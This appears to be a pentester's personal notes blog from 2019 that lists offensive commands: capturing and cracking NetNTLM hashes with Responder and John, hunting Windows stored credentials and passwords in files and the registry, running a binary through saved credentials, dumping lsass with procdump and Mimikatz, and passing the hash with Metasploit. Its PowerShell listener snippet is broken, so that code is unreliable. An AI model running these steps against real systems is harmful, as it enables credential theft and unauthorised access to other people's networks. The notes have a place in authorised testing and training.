Thursday, October 31, 2019

Nmap Open Web Ports to CSV

nmap scan web ports (80,443,8080,8443) and output to csv using sed

nmap -T4 --max-rtt-timeout 200ms --initial-rtt-timeout 150ms --min-hostgroup 512 -Pn -p 80,443,8080,8443 -oG - | egrep -v "^#|Status: Up" | sed -E 's/Host\:\s([^\s]+)\s[(]([^)]*)[)]\s+Ports[:]\s80\/([^/]+)\/.+443\/([^/]+)\/.+8080\/([^/]+)\/.+8443\/([^/]+)\/.*/\1,\2,\3,\4,\5,\6/' | grep open


Tuesday, October 22, 2019

Sample Responder command

responder -I eth0 -r -b

cd /usr/share/responder/logs

john --format=netntlm SMB-NTLMv1-SSP- --wordlist=/usr/share/wordlists/rockyou.txt

john --format=netntlmv2 SMB-NTLMv2-SSP- --wordlist=/usr/share/wordlists/rockyou.txt

Friday, October 18, 2019

Print all Mac Address Vendors around you (Arp -a)

# print all mac address vendors around you (using arp table and this great python library )

import os
from mac_vendor_lookup import MacLookup

myCmd = os.popen("arp -a").read()
for line in myCmd.splitlines():
 for item in line.split():
  if "-" in item:
   if "--" not in item:
     print(item + ": " + MacLookup().lookup(item))
     print(item + ": not found")

View Stored Credentials and Runas

>cmdkey /list

Currently stored credentials:


runas /savecred /user:XXXX "c:\BAD.exe"

Search inside Windows Files for passwords

>findstr /s password c:\*.ps1

Password Searching in Registry

REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKLM /F "password" /t REG_SZ /S

REG QUERY HKCU /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S

Get File Shares Exposed "net share"

>net share

Share name   Resource                        Remark

C$           C:\                             Default share
IPC$                                         Remote IPC
print$       C:\WINDOWS\system32\spool\drivers                                             Printer Drivers
ADMIN$       C:\WINDOWS                      Remote Admin

Password Login Settings "net accounts"

>net accounts
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          0
Maximum password age (days):                          30
Minimum password length:                              15
Length of password history maintained:                12
Lockout threshold:                                    3
Lockout duration (minutes):                           45
Lockout observation window (minutes):                 45
Computer role:                                        WORKSTATION

Get File Shares Drive Letters wmic logicaldisk

>wmic logicaldisk get caption, description, providername
Caption  Description         ProviderName
C:       Local Fixed Disk
X:       Network Connection  \\server\user\XXX
Y:       Network Connection  \\server\public

Print all environment variables "set"


CommonProgramFiles=C:\Program Files\Common Files
CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
CommonProgramW6432=C:\Program Files\Common Files

Patches Installed wmic qfe

>wmic qfe

Caption                                     CSName       Description      FixComments  HotFixID   InstallDate  InstalledBy          InstalledOn  Name  ServicePackInEffect  Status  PCNAME Update                        KB4514366               NT AUTHORITY\SYSTEM  XX/XX/XXXX  PCNAME  Update                        KB4515855  PCNAME  Update                        KB4465065               NT AUTHORITY\SYSTEM  XX/XX/XXXX  PCNAME  Security Update               KB4470788                                    XX/XX/XXXX  PCNAME  Security Update               KB4489907                                    XX/XX/XXXX  PCNAME  Security Update               KB4503308               NT AUTHORITY\SYSTEM  XX/XX/XXXX

Windows Systeminfo

>systeminfo | findstr /C:"OS Name" /C:"OS Version"

OS Name:                   Microsoft Windows 10
OS Version:                10.0.XXX N/A Build XXXX
BIOS Version:              Dell Inc. 1.XX, XX/XX/XXX

Tuesday, October 15, 2019

Powershell listening on a port

$socket = new-object System.Net.Sockets.TcpListener('', 1080);
if($socket -eq $null){
exit 1;
$client = $socket.AcceptTcpClient();
$stream = $client.GetStream();
$buffer = new-object System.Byte[] 2048;

    $read = $null;
    while($stream.DataAvailable -or $read -eq $null) {
    $read = $stream.Read($buffer, 0, 2048);
    if ($read -gt 0) {
                    $data = [System.Text.Encoding]::ASCII.GetString($buffer).Trim(0x00).TrimEnd()
                    if($data -ne $null -and $data .Length -gt 0){
                        Write-Output ("RECEIVED : [{0}]" -f $data)
                        $sendBack = new-object System.Byte[] 2048;
                        $sendBack = [System.Text.Encoding]::UTF8.GetBytes($data)
                        $stream.Write($sendBack, 0, $results.Length)
                        Write-Output ("SENT BACK: [{0}]" -f $data)
    } While ($read -gt 0);

Wednesday, October 2, 2019

Lsass Dump Mimikatz Pass the Hash Basics

procdump -ma lsass.exe {path to where you want it dumped}\lsass.dmp

# sekurlsa::minidump lsass.dmp
# sekurlsa::logonPasswords

Username : {user}
Domain     : {domain}
NTLM       : {NTLM Hash}

use auxillary/scanner/smb/smb_login
set SMBDomain {domain}
set SMBUser {user}
set RHOSTS {ip addr}
set SMBPass aad3b435b51404eeaad3b435b51404ee:{NTLM Hash}

good blog

When you can & cannot Pass the Hash

great blog

From a pentesting perspective:
  • You CAN perform Pass-The-Hash attacks with NTLM hashes.
  • You CANNOT perform Pass-The-Hash attacks with Net-NTLM hashes.
You get NTLM hashes when dumping the SAM database of any Windows OS, a Domain Controller's NTDS.dit database or from Mimikatz (Fun fact, although you can't get clear-text passwords from Mimikatz on Windows >= 8.1 you can get NTLM hashes from memory). Some tools just give you the NT hash (e.g. Mimikatz) and that's perfectly fine: obviously you can still Pass-The-Hash with just the NT hash.
You get Net-NTLMv1/v2 (a.k.a NTLMv1/v2) hashes when using tools like Responder or Inveigh.